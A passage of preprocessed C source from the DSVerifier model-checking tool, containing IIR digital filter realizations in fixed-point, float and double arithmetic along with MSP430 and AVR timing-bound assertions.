) ; else __assert_fail (
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"power >= 1.0f"
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 412, __extension__ __PRETTY_FUNCTION__); }))
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
}
return 9999.9f;
}
unsigned long next = 1;
int rand(void)
{
next = next*1103515245 + 12345;
return (unsigned int)(next/65536) % 32768;
}
void srand(unsigned int seed)
{
next = seed;
}
float iirIIOutTime(float w[], float x, float a[], float b[], int Na, int Nb) {
int timer1 = 0;
float *a_ptr, *b_ptr, *w_ptr;
float sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
timer1 += 71;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
timer1 += 54;
}
w[0] += x;
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
timer1 += 46;
}
timer1 += 38;
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"(double)timer1*CYCLE <= (double)DEADLINE"
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 450, __extension__ __PRETTY_FUNCTION__); }))
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
return sum;
}
float iirIItOutTime(float w[], float x, float a[], float b[], int Na, int Nb) {
int timer1 = 0;
float *a_ptr, *b_ptr;
float yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
timer1 += 105;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
timer1 += 41;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
timer1 += 38;
}
timer1 += 54;
}
timer1 += 7;
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"(double)timer1*CYCLE <= (double)DEADLINE"
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 477, __extension__ __PRETTY_FUNCTION__); }))
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
return yout;
}
double iirIItOutTime_double(double w[], double x, double a[], double b[], int Na, int Nb) {
int timer1 = 0;
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
timer1 += 105;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
timer1 += 41;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
timer1 += 38;
}
timer1 += 54;
}
timer1 += 7;
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"(double)timer1*CYCLE <= (double)DEADLINE"
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 504, __extension__ __PRETTY_FUNCTION__); }))
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
return yout;
}
void iirOutBoth(float yf[], float xf[], float af[], float bf[], float *sumf_ref,
fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t *sum_ref, int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr;
fxp_t sum = 0;
float sumf = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
af_ptr = &af[1];
yf_ptr = &yf[Na - 1];
bf_ptr = &bf[0];
xf_ptr = &xf[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum = fxp_add(sum, fxp_mult(*b_ptr++, *x_ptr--));
sumf += *bf_ptr++ * *xf_ptr--;
}
for (j = 1; j < Na; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr++, *y_ptr--));
sumf -= *af_ptr++ * *yf_ptr--;
}
*sum_ref = sum;
*sumf_ref = sumf;
}
fxp_t iirOutFixedL(fxp_t y[], fxp_t x[], fxp_t xin, fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
int i, j;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
}
x[Nb - 1] = xin;
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
for (j = 1; j < Na - 1; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[j] = y[j+1];
}
if(Na>1) sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[Na - 1] = sum;
return sum;
}
float iirOutFloatL(float y[], float x[], float xin, float a[], float b[], int Na, int Nb) {
float *a_ptr, *y_ptr, *b_ptr, *x_ptr;
float sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
int i, j;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum += *b_ptr-- * *x_ptr++;
}
x[Nb - 1] = xin;
sum += *b_ptr-- * *x_ptr++;
for (j = 1; j < Na - 1; j++) {
sum -= *a_ptr-- * *y_ptr++;
y[j] = y[j+1];
}
if(Na>1) sum -= *a_ptr-- * *y_ptr++;
y[Na - 1] = sum;
return sum;
}
float iirOutBothL(float yf[], float xf[], float af[], float bf[], float xfin,
fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t xin, int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr;
float sumf = 0;
af_ptr = &af[Na - 1];
yf_ptr = &yf[1];
bf_ptr = &bf[Nb - 1];
xf_ptr = &xf[0];
int i, j;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
xf[i] = xf[i+1];
sumf += *bf_ptr-- * *xf_ptr++;
}
x[Nb - 1] = xin;
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
xf[Nb - 1] = xfin;
sumf += *bf_ptr-- * *xf_ptr++;
for (j = 1; j < Na - 1; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[j] = y[j+1];
sumf -= *af_ptr-- * *yf_ptr++;
yf[j] = yf[j+1];
}
if(Na>1) sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[Na - 1] = sum;
if(Na>1) sumf -= *af_ptr-- * *yf_ptr++;
yf[Na - 1] = sumf;
return fxp_to_float(sum) - sumf;
}
float iirOutBothL2(float yf[], float xf[], float af[], float bf[], float xfin,
fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t xin, int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr;
float sumf = 0;
af_ptr = &af[Na - 1];
yf_ptr = &yf[1];
bf_ptr = &bf[Nb - 1];
xf_ptr = &xf[0];
int i=0, j=1;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum = fxp_add(sum, fxp_mult(b[Nb - 1 - i], x[i]));
xf[i] = xf[i+1];
sumf += bf[Nb - 1 - i] * xf[i];
}
x[Nb - 1] = xin;
sum = fxp_add(sum, fxp_mult(b[Nb - 1 - i], x[i]));
xf[Nb - 1] = xfin;
sumf += bf[Nb - 1 - i] * xf[i];
for (j = 1; j < Na - 1; j++) {
sum = fxp_sub(sum, fxp_mult(a[Na - j], y[j]));
y[j] = y[j+1];
sumf -= af[Na - j] * yf[j];
yf[j] = yf[j+1];
}
if(Na>1) sum = fxp_sub(sum, fxp_mult(a[Na - j], y[j]));
y[Na - 1] = sum;
if(Na>1) sumf -= af[Na - j] * yf[j];
yf[Na - 1] = sumf;
return fxp_to_float(sum) - sumf;
}
# 25 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
extern digital_system ds;
extern hardware hw;
extern int generic_timer;
fxp_t fxp_direct_form_1(fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum = fxp_add(sum, fxp_mult(*b_ptr++, *x_ptr--));
}
for (j = 1; j < Na; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr++, *y_ptr--));
}
fxp_verify_overflow_node(sum, "An Overflow Occurred in the node a0");
sum = fxp_div(sum,a[0]);
return fxp_quantize(sum);
}
fxp_t fxp_direct_form_2(fxp_t w[], fxp_t x, fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *b_ptr, *w_ptr;
fxp_t sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
for (j = 1; j < Na; j++) {
w[0] = fxp_sub(w[0], fxp_mult(*a_ptr++, *w_ptr++));
}
w[0] = fxp_add(w[0], x);
w[0] = fxp_div(w[0], a[0]);
fxp_verify_overflow_node(w[0], "An Overflow Occurred in the node b0");
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum = fxp_add(sum, fxp_mult(*b_ptr++, *w_ptr++));
}
return fxp_quantize(sum);
}
fxp_t fxp_transposed_direct_form_2(fxp_t w[], fxp_t x, fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *b_ptr;
fxp_t yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = fxp_add(fxp_mult(*b_ptr++, x), w[0]);
yout = fxp_div(yout, a[0]);
int j;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] = fxp_sub(w[j], fxp_mult(*a_ptr++, yout));
}
if (j < Nb - 1) {
w[j] = fxp_add(w[j], fxp_mult(*b_ptr++, x));
}
}
fxp_verify_overflow_node(w[j], "An Overflow Occurred in the node a0");
return fxp_quantize(yout);
}
double double_direct_form_1(double y[], double x[], double a[], double b[], int Na, int Nb) {
double *a_ptr, *y_ptr, *b_ptr, *x_ptr;
double sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum += *b_ptr++ * *x_ptr--;
}
for (j = 1; j < Na; j++) {
sum -= *a_ptr++ * *y_ptr--;
}
sum = (sum / a[0]);
return sum;
}
double double_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
double *a_ptr, *b_ptr, *w_ptr;
double sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
}
w[0] += x;
w[0] = w[0] / a[0];
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
}
return sum;
}
double double_transposed_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
yout = yout / a[0];
int j;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
}
}
return yout;
}
float float_direct_form_1(float y[], float x[], float a[], float b[], int Na, int Nb) {
float *a_ptr, *y_ptr, *b_ptr, *x_ptr;
float sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum += *b_ptr++ * *x_ptr--;
}
for (j = 1; j < Na; j++) {
sum -= *a_ptr++ * *y_ptr--;
}
sum = (sum / a[0]);
return sum;
}
float float_direct_form_2(float w[], float x, float a[], float b[], int Na, int Nb) {
float *a_ptr, *b_ptr, *w_ptr;
float sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
}
w[0] += x;
w[0] = w[0] / a[0];
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
}
return sum;
}
float float_transposed_direct_form_2(float w[], float x, float a[], float b[], int Na, int Nb) {
float *a_ptr, *b_ptr;
float yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
yout = yout / a[0];
int j;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
}
}
return yout;
}
double double_direct_form_1_MSP430(double y[], double x[], double a[], double b[], int Na, int Nb){
int timer1 = 0;
double *a_ptr, *y_ptr, *b_ptr, *x_ptr;
double sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na-1];
b_ptr = &b[0];
x_ptr = &x[Nb-1];
int i, j;
timer1 += 91;
for (i = 0; i < Nb; i++){
sum += *b_ptr++ * *x_ptr--;
timer1 += 47;
}
for (j = 1; j < Na; j++){
sum -= *a_ptr++ * *y_ptr--;
timer1 += 57;
}
timer1 += 3;
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
((void) sizeof ((
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ; else __assert_fail (
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
"(double) timer1 * hw.cycle <= ds.sample_time"
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 235, __extension__ __PRETTY_FUNCTION__); }))
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
;
return sum;
}
double double_direct_form_2_MSP430(double w[], double x, double a[], double b[], int Na, int Nb) {
int timer1 = 0;
double *a_ptr, *b_ptr, *w_ptr;
double sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
timer1 += 71;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
timer1 += 54;
}
w[0] += x;
w[0] = w[0] / a[0];
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
timer1 += 46;
}
timer1 += 38;
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
((void) sizeof ((
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ; else __assert_fail (
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
"(double) timer1 * hw.cycle <= ds.sample_time"
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 262, __extension__ __PRETTY_FUNCTION__); }))
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
;
return sum;
}
double double_transposed_direct_form_2_MSP430(double w[], double x, double a[], double b[], int Na, int Nb) {
int timer1 = 0;
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
timer1 += 105;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
timer1 += 41;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
timer1 += 38;
}
timer1 += 54;
}
timer1 += 7;
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
((void) sizeof ((
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ; else __assert_fail (
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
"(double) timer1 * hw.cycle <= ds.sample_time"
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 291, __extension__ __PRETTY_FUNCTION__); }))
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
;
return yout;
}
double generic_timing_double_direct_form_1(double y[], double x[], double a[], double b[], int Na, int Nb){
generic_timer += ((6 * hw.assembly.push) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (12 * hw.assembly.std));
double *a_ptr, *y_ptr, *b_ptr, *x_ptr;
double sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na-1];
b_ptr = &b[0];
x_ptr = &x[Nb-1];
generic_timer += ((12 * hw.assembly.std) + (12 * hw.assembly.ldd) + (2 * hw.assembly.subi) + (2 * hw.assembly.sbci) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (1 * hw.assembly.adiw));
int i, j;
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (i = 0; i < Nb; i++){
generic_timer += ((20 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.sbc) + (10 * hw.assembly.std) + (2 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp));
sum += *b_ptr++ * *x_ptr--;
}
generic_timer += ((2 * hw.assembly.ldi) + (2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (j = 1; j < Na; j++){
generic_timer += ((22 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.subi) + (8 * hw.assembly.std) + (1 * hw.assembly.sbci) + (2 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (1 * hw.assembly.sbc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp));
sum -= *a_ptr++ * *y_ptr--;
}
generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (6 * hw.assembly.pop) + (1 * hw.assembly.ret));
return sum;
}
double generic_timing_double_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
generic_timer += ((8 * hw.assembly.push) + (14 * hw.assembly.std) + (3 * hw.assembly.out) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli));
double *a_ptr, *b_ptr, *w_ptr;
double sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
generic_timer += ((10 * hw.assembly.std) + (6 * hw.assembly.ldd) + (2 * hw.assembly.adiw));
generic_timer += ((2 * hw.assembly.ldi) + (2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
generic_timer += ((23 * hw.assembly.ldd) + (32 * hw.assembly.mov) + (9 * hw.assembly.std) + (2 * hw.assembly.subi) + (3 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (2 * hw.assembly.sbci) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brge));
}
w[0] += x;
w_ptr = &w[0];
generic_timer += ((13 * hw.assembly.ldd) + (12 * hw.assembly.mov) + (5 * hw.assembly.std) + (1 * hw.assembly.st) + (1 * hw.assembly.ld) + (1 * hw.assembly.rcall));
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
generic_timer += ((20 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (10 * hw.assembly.std) + (2 * hw.assembly.rcall) + (2 * hw.assembly.ld) + (2 * hw.assembly.subi) + (2 * hw.assembly.sbci) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp));
}
generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (8 * hw.assembly.pop) + (1 * hw.assembly.ret));
return sum;
}
double generic_timing_double_transposed_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
generic_timer += ((8 * hw.assembly.push) + (14 * hw.assembly.std) + (3 * hw.assembly.out) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli));
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
generic_timer += ((15 * hw.assembly.std) + (22 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.rcall) + (2 * hw.assembly.ld) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.brge) + (1 * hw.assembly.adiw));
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
}
